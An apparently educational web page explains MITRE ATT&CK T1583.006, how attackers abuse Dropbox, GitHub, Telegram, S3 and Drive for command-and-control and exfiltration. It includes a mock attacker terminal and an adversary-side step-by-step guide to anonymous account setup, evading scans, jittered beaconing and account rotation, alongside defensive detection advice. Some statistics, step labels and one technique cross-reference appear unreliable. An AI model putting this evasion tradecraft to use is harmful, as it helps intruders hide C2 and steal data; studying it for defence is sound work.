Cyber Pulse Academy

Latest News
T1583.006 , Resource Development (TA0042)

Acquire Infrastructure: Web Services

Adversaries hijack trusted platforms , Dropbox, GitHub, Telegram, AWS S3 , to hide command-and-control, exfiltrate data, and distribute malware behind legitimate traffic.

MITRE ATT&CK • Sub-technique T1583.006

15+ Platforms Abused for C2
100% Bypasses Standard Firewalls
$0 Cost to Register Accounts
47% Attacks Use Cloud Web Services
Web Services Hijack Dashboard LIVE MONITORING
Hijacked , C2 Channel
Dropbox EXFIL
dropbox.com/s/x8k2m9.../payload.exe
Stolen documents exfiltrated via shared Dropbox folder. Malware downloads disguised as invoice PDFs.
Hijacked , C2 Code
GitHub C2
github.com/corp-tools/update-agent
C2 commands embedded in GitHub Issues comments. Staged code in fake "dependency update" repos.
Hijacked , Data Signal
Telegram SIGNAL
t.me/bot478291a_c2handler
Bot receives stolen credentials and exfiltrated data. Encrypted channels hide all C2 communications.
Hijacked , Payload Host
AWS S3 HOST
s3.amazonaws.com/bucket-corp-assets/
Public S3 bucket hosts trojanized installers. Leverages AWS CDN for high-availability payload delivery.
Hijacked , Phishing Page
Blogspot PHISH
corporate-update-2024.blogspot.com
Credential harvesting portal hosted on free Blogspot. Mimics corporate login page with stolen branding.
Hijacked , Data Drop
Google Drive DROP
drive.google.com/drive/folders/1aBc...
Exfiltrated sensitive files stored in shared Drive folder. Webhook triggers for new uploads.
Data Exfiltration Pipeline
Attacker
GitHub C2
Victim
Dropbox
Attacker Account Registration Pipeline
STEP 1
Create anonymous email via ProtonMail
STEP 2
Register Dropbox, GitHub, Telegram
STEP 3
Upload C2 code & malware payloads
STEP 4
Integrate with implants & go live
attacker@kali:~/web_svc_c2
$ python3 -m telebot_init --token 7482910371:AAH...
[+] Telegram bot registered: @c2_handler_bot
$ gh repo create corp-dependencies-update --private
[+] GitHub repo created: github.com/attacker/corp-dependencies-update
$ dbxcli upload payloads/implant_v3.exe /Public/drop/invoice_q4.exe
[+] Payload uploaded to Dropbox: 2.3 MB
$ aws s3 mb s3://corp-assets-2024 --region us-east-1
[+] S3 bucket created: corp-assets-2024 (public access: enabled)
$ ./c2_server --channels telegram,github,dropbox --listen
[+] C2 server active , 3 channels online , 12 implants connected
$ ./c2_server --exfil --dest drive://exfil_data --encrypt AES256
CRITICAL: 12 Active Implants Detected WARNING: S3 Bucket Misconfigured (Public) INFO: GitHub API Rate Limit Reached , Rotating Tokens

Why It Matters

Web services represent one of the most insidious infrastructure acquisition techniques because they exploit the fundamental trust that organizations place in globally recognized platforms. When adversaries use Dropbox, GitHub, Telegram, AWS S3, Google Drive, or Blogspot as command-and-control channels or data exfiltration destinations, the resulting network traffic is virtually indistinguishable from legitimate business activity. This makes detection extraordinarily difficult for traditional firewalls, intrusion detection systems, and network monitoring tools that are configured to allow traffic to these trusted domains.

The economic barriers are negligible , all major web services offer free tiers that provide ample bandwidth, storage, and API access for initial reconnaissance and attack operations. Adversaries can register accounts in minutes using anonymous email addresses, VPN connections, and temporary phone numbers. Once established, these accounts serve as resilient attack infrastructure that can survive the takedown of individual domains or IP addresses. According to CISA and industry threat reports, nearly 47% of observed advanced persistent threat (APT) operations leverage at least one legitimate web service for C2 or data exfiltration, and this percentage continues to grow as organizations migrate more operations to cloud-based platforms.

The defensive challenge is compounded by the business reality that blocking access to Dropbox, Google Drive, GitHub, or Telegram would cause massive operational disruption for virtually every modern enterprise. This asymmetry , where the attacker can freely use any service, but the defender cannot block any service , gives adversaries an inherent advantage. Blocking these services is not a viable strategy; instead, organizations must invest in behavioral analytics, CASB (Cloud Access Security Broker) solutions, UEBA (User and Entity Behavior Analytics), and granular cloud access monitoring to detect the subtle anomalies that indicate abuse of web services for malicious purposes.

Bypasses Firewall Rules

Traffic to legitimate web services passes through firewalls undetected. HTTPS encryption prevents deep packet inspection of C2 commands hidden within API requests.

Impossible to Block

Organizations rely on Dropbox, GitHub, Google Drive, and Telegram for daily operations. Blocking these services would halt business productivity entirely.

Zero-Cost Infrastructure

Free tiers provide 2-15 GB storage, unlimited API calls, and generous bandwidth. Adversaries pay nothing to establish operational infrastructure that would cost thousands in VPS hosting.

Resilient & Redundant

When one account is flagged and shut down, adversaries instantly create replacements. Multi-service C2 chains (GitHub + Telegram + Dropbox) provide built-in failover capability.

Anonymous Registration

Temporary email addresses, VPN connections, and virtual phone numbers allow attackers to create accounts with zero identity verification, making attribution nearly impossible.

Growing Attack Vector

As cloud adoption accelerates, the attack surface for web service abuse grows proportionally. CASB vendors report a 78% increase in web service abuse attempts year-over-year.

Key Terms & Concepts

Definition

Acquiring Web Services (T1583.006) refers to the adversary practice of registering accounts on legitimate, publicly available web-based platforms , such as cloud storage services, code repositories, social media platforms, file-sharing services, and communication tools , and repurposing them for malicious operational use. Unlike traditional infrastructure acquisition (T1583.001 Domains, T1583.003 VPS), web service abuse leverages the reputation and trust of major platforms to evade detection. Adversaries use these services for command-and-control (C2), data exfiltration, payload hosting, credential harvesting, and malware distribution, all while their traffic blends seamlessly with millions of legitimate users accessing the same platforms.

Everyday Analogy

Imagine using a public post office to send secret messages. The post office is trusted, it processes millions of letters every day, and your suspicious letter blends in perfectly with all the legitimate mail. No one inspects every envelope , that would stop the entire postal system. In the same way, adversaries use trusted web services like Dropbox, GitHub, and Telegram as their "post office", knowing that security tools won't block traffic to these platforms because doing so would shut down normal business operations. The malicious communications hide in plain sight, surrounded by billions of legitimate user interactions.

Cloud Storage Abuse
Using Dropbox, Google Drive, OneDrive, or AWS S3 to host malware payloads, exfiltrate stolen data, or store C2 configuration files that implants retrieve during operation.
GitHub C2
Embedding command-and-control instructions in GitHub repository files, Issues comments, or Gists. Implants poll GitHub APIs to receive commands and submit exfiltrated data.
Social Media C2
Using Twitter/X posts, algorithmically generated handles, Facebook pages, or Telegram channels as C2 communication channels that blend with normal social media traffic.
S3 Bucket Abuse
Creating or discovering misconfigured Amazon S3 buckets with public read access to host trojanized software, phishing pages, or staged payloads for download by compromised machines.
File Sharing Services
Abusing platforms like OneHub, Sync, TeraBox, or filemail[.]com to distribute malicious tools, receive stolen data uploads, and maintain persistent data transfer channels with implants.

Real-World Scenario

Ryan O'Connor is a mid-level threat actor affiliated with a financially motivated cybercrime group. His objective: infiltrate Meridian Financial Services, a mid-size accounting firm handling sensitive client financial records, and exfiltrate confidential documents for ransom and competitive intelligence purposes.

Rather than purchasing servers or registering custom domains , both of which leave financial and attribution trails , Ryan chooses a stealthier approach. He leverages the free tiers of widely trusted web services to build a completely free, anonymous attack infrastructure that produces traffic indistinguishable from normal employee activity.

The result is devastating. Over a six-week campaign, Ryan exfiltrates 4.7 GB of confidential client financial records, deploys ransomware to 23 workstations, and maintains persistent access through a multi-channel C2 chain that the security team never detects because all traffic flows through legitimate web service APIs.

Week 1 , Account Registration
Ryan creates a ProtonMail account with a fake identity, then registers free accounts on Dropbox, Google Drive, GitHub, and Telegram using the anonymous email. He uses Mullvad VPN to mask his IP address during registration. All accounts use innocuous-sounding usernames like "data_sync_ops" and "backup_tools_2024".
Week 2 , C2 Infrastructure Setup
Ryan creates a private GitHub repository named "dependency-updates" and populates it with innocent-looking configuration files. He embeds encoded C2 commands in the file contents and uses GitHub's Issues API as a secondary command channel. A Telegram bot is created to receive real-time exfiltration alerts and stolen credential notifications.
Week 3 , Initial Access
Ryan sends a spear-phishing email containing a Dropbox link to a trojanized Excel document. The document exploits CVE-2024-XXXX to drop a first-stage implant that reaches out to the GitHub repository for further instructions. The initial payload download passes through the corporate firewall because it originates from api.dropbox.com , a trusted domain.
Week 4 , Lateral Movement & Escalation
The implant downloads additional tools from the AWS S3 bucket and uses GitHub Gists to receive lateral movement commands. Ryan escalates privileges using harvested credentials from the Telegram bot notifications. All tool downloads originate from s3.amazonaws.com, blending with normal AWS CloudFront CDN traffic used by Meridian's IT department.
Week 5 , Data Exfiltration
Ryan configures implants to upload stolen documents to a shared Google Drive folder and a Dropbox Business account. Large financial files are split into 25 MB chunks and uploaded incrementally. The Telegram bot receives real-time notifications of each file upload. Total exfiltrated data: 4.7 GB across 312 files.
Week 6 , Ransomware Deployment & Exit
Ryan deploys ransomware binaries hosted on the S3 bucket to 23 workstations simultaneously. After the ransom demands are issued via encrypted Telegram messages, Ryan deletes all web service accounts, purges the GitHub repository, and removes the S3 bucket contents , leaving almost no forensic trail beyond encrypted traffic logs to trusted domains.

Step-by-Step Guide

1

Identify Suitable Web Services DETECT

Research and select web services that the target organization's employees are likely to use and that the network firewall permits. The goal is to choose platforms where your traffic will blend in with normal activity.

  • Analyze target organization's allowed web traffic using reconnaissance tools and OSINT to identify which services (Dropbox, Google Drive, GitHub, etc.) are not blocked
  • Evaluate free tier limits: storage capacity, API rate limits, bandwidth caps, and file size restrictions to ensure they meet operational requirements
  • Prefer services with HTTPS encryption to prevent network-based inspection of uploaded content and C2 commands
2

Create Anonymous Accounts PREVENT

Register accounts on selected web services using anonymization techniques to prevent attribution. Each account should appear legitimate to both automated abuse detection systems and manual review.

  • Generate a fake identity using temporary email services (ProtonMail, Guerrilla Mail) and virtual phone numbers for SMS verification requirements
  • Route all registration traffic through a commercial VPN or Tor to mask the originating IP address from the web service provider
  • Use realistic-sounding usernames and profile information that matches the fake identity to avoid triggering suspicious account flags

Cross-reference: T1583 Acquire Infrastructure, T1583.003 Virtual Private Server

3

Configure Services for C2 & Data Exfiltration DETECT

Set up the web service accounts to serve as C2 channels, payload hosting platforms, and data exfiltration destinations. This involves creating the appropriate file structures, API integrations, and communication protocols.

  • For GitHub C2: Create private repositories with encoded configuration files, use Issues/PR comments for command channels, and leverage Gists for dynamic payload delivery
  • For cloud storage (Dropbox, Google Drive, AWS S3): Configure shared folders with public links, set up webhooks for upload notifications, and stage malware payloads with innocuous file names
  • For Telegram/Social Media C2: Create bots with the BotFather API, establish private channels for encrypted communication, and configure automatic message forwarding for real-time data alerts

Cross-reference: T1583.007 Virtual Private Server for complementary VPS-based C2

4

Integrate with Malware & Operational Tools RESPOND

Develop or configure malware implants and operational tooling that communicate exclusively through the selected web services. The integration must be seamless and produce traffic patterns consistent with normal user behavior.

  • Program implants to use the web service's native API (e.g., Dropbox API, GitHub REST API, Telegram Bot API) with appropriate rate limiting and error handling
  • Implement data chunking and encryption for large file exfiltration to avoid triggering anomaly detection on upload volume thresholds
  • Add randomized timing (jitter) to C2 polling intervals to mimic human browsing patterns and avoid statistical detection of automated beaconing
5

Test Operational Security PREVENT

Before launching operations against the actual target, validate that the web service infrastructure functions correctly and that traffic patterns appear normal to network monitoring tools.

  • Test all C2 channels from a network environment that mirrors the target's egress firewall rules to confirm traffic passes unblocked
  • Verify that file uploads to cloud storage services complete without triggering malware scanning or content policy violations
  • Validate failover between multiple web services to ensure operational continuity if any single account is suspended or flagged
6

Rotate Services to Avoid Detection RESPOND

Maintain operational resilience by regularly creating new accounts, migrating C2 channels, and rotating the web services used to prevent pattern-based detection and minimize the impact of account takedowns.

  • Establish a pipeline for rapid account provisioning on each web service, with pre-built scripts that automate registration, configuration, and content upload
  • Implement a "burn" threshold: if an account shows signs of detection (unusual login attempts, CAPTCHA challenges, or rate limit warnings), immediately migrate to a fresh replacement
  • Maintain a diverse portfolio of at least 3-5 different web services in the active C2 chain to ensure no single point of failure can disrupt operations

Cross-reference: T1583, T1583.003, T1583.007

Common Mistakes & Best Practices

Common Mistakes (Red Team)

Using the same anonymous email for multiple web service registrations, creating a shared attribution point that links all infrastructure together.
Uploading malware binaries directly to cloud storage without encryption or obfuscation, triggering automated content scanning and immediate account suspension.
Using exact API polling intervals (e.g., every 60 seconds) that create distinctive beaconing patterns detectable by network anomaly detection systems.
Failing to implement account rotation , operating the same accounts for weeks or months, allowing defenders to baseline and detect the anomalous behavior.
Uploading excessive data volumes that exceed normal user behavior thresholds on cloud storage services, triggering usage anomaly alerts in CASB systems.

Best Practices (Blue Team)

Deploy a Cloud Access Security Broker (CASB) to monitor all cloud storage and web service API traffic for anomalous upload patterns, unusual file access times, and bulk data transfers.
Implement User and Entity Behavior Analytics (UEBA) to establish baselines for normal web service usage per employee and alert on deviations that suggest automated tool behavior.
Enable detailed cloud access logging (AWS CloudTrail, Google Cloud Audit Logs, Microsoft 365 Audit Logs) and forward logs to a SIEM for real-time correlation analysis.
Enforce multi-factor authentication (MFA) on all corporate web service accounts and restrict API access using conditional access policies based on device posture and network location.
Implement network traffic analytics that detect beaconing patterns, unusual API call frequencies, and data upload volumes that deviate from established organizational baselines.

Red Team vs Blue Team View

Red Team Perspective

How adversaries maximize the effectiveness of web service abuse

  • Blend all C2 traffic with legitimate web service usage , Dropbox, Google Drive, GitHub, and Telegram traffic is whitelisted by virtually every corporate firewall and proxy configuration
  • Exploit free tiers to establish zero-cost infrastructure that requires no financial commitment, no credit card verification, and leaves no payment trail for attribution
  • Maintain operational resilience through account redundancy: pre-stage 10-20 accounts per service so that if one is flagged, the C2 chain switches to a replacement within minutes
  • Leverage HTTPS encryption on all web services to prevent deep packet inspection from revealing C2 commands, exfiltrated data contents, or malware signatures
  • Use web service APIs with rate limiting and jitter to mimic human interaction patterns and avoid detection by beaconing analysis tools

Blue Team Perspective

How defenders detect and mitigate web service abuse

  • Deploy CASB solutions that provide visibility into all cloud application usage, including shadow IT discovery and granular policy enforcement for file uploads and API access
  • Implement UEBA platforms that baseline normal user behavior across web services and generate alerts for anomalous patterns such as unusual upload volumes, odd access times, or API call frequencies
  • Enable comprehensive cloud access logging (CloudTrail, Azure AD Audit Logs, Google Cloud Audit Logs) and forward all logs to a centralized SIEM for cross-platform correlation and threat hunting
  • Conduct regular threat hunting queries focused on web service abuse indicators: accounts created from VPN exits, bulk file downloads, API polling patterns, and new account registrations
  • Deploy anomaly detection algorithms that identify data exfiltration patterns by monitoring outbound bandwidth to web service APIs and flagging transfers that exceed statistical baselines

Threat Hunter's Eye

Unusual Cloud Storage Activity

Monitor for users uploading large volumes of data to Dropbox, Google Drive, or OneDrive outside of normal business hours. Look for file uploads to newly created shared folders or accounts that were registered within the past 30 days. Pay special attention to files with double extensions (.pdf.exe, .docx.bat) or files that trigger malware scan warnings.

HIGH

GitHub Account Behavior Anomalies

Investigate GitHub accounts that are accessed from corporate networks but have no corresponding software development role. Look for accounts that primarily create private repositories, frequently delete and recreate repositories, or have API access patterns consistent with automated polling rather than human development workflows.

HIGH

Telegram API Patterns

Detect unusual Telegram usage patterns from corporate endpoints, especially connections to the Telegram Bot API. Monitor for persistent long-lived WebSocket connections to Telegram servers, frequent API polling from non-developer workstations, and data transfers that are consistent with automated exfiltration rather than human chat activity.

MEDIUM

S3 Bucket Enumeration & Misconfiguration

Monitor for internal systems accessing public S3 buckets that are not owned by the organization. Track DNS queries for known S3 bucket naming patterns and investigate endpoints that make repeated requests to s3.amazonaws.com from unusual user agents or IP addresses. Alert on any internal connection to S3 buckets containing known-malicious file hashes.

HIGH

Web Service API Beaconing

Deploy RITA or similar beaconing analysis tools to detect periodic connections to web service APIs (api.github.com, api.dropbox.com, api.telegram.org) that occur at regular intervals. Look for connections from endpoints that do not normally interact with these services and flag any API polling that maintains consistent timing intervals without human variation.

MEDIUM

New Account Registration Patterns

Monitor SSO/identity provider logs for new OAuth token grants to web services that the user has not previously accessed. Flag accounts created on cloud storage or code repository platforms during off-hours, especially when the registration originates from VPN or proxy exit nodes that are not typical for the organization's geographic profile.

LOW

Continue Exploring

Deepen Your Understanding of Attack Infrastructure

Web services abuse (T1583.006) is just one of eight distinct infrastructure acquisition sub-techniques in the MITRE ATT&CK framework. Understanding the full spectrum , from domain registration to VPS provisioning to botnet acquisition , is essential for building comprehensive defenses against modern adversary operations. Explore the related techniques below to complete your knowledge of the Resource Development tactic.

Web Services


DONATE · SUPPORT

We keep threat intelligence free. No paywalls, no ads. Your donation directly funds server infrastructure, research, and tools. Every contribution - no matter the size - makes this platform sustainable.
100% of your support goes to the platform. No corporate sponsors, just the community.
ROOT::DONATE

Leave a Comment

Your email address will not be published. Required fields are marked *



Ask ChatGPT
Set ChatGPT API key
Find your Secret API key in your ChatGPT User settings and paste it here to connect ChatGPT with your Courses LMS website.
Certification Courses
Hands-On Labs
Threat Intelligence
Latest Cyber News
MITRE ATT&CK Breakdown
All Cyber Keywords

Every contribution moves us closer to our goal: making world-class cybersecurity education accessible to ALL.

Choose the amount of donation by yourself.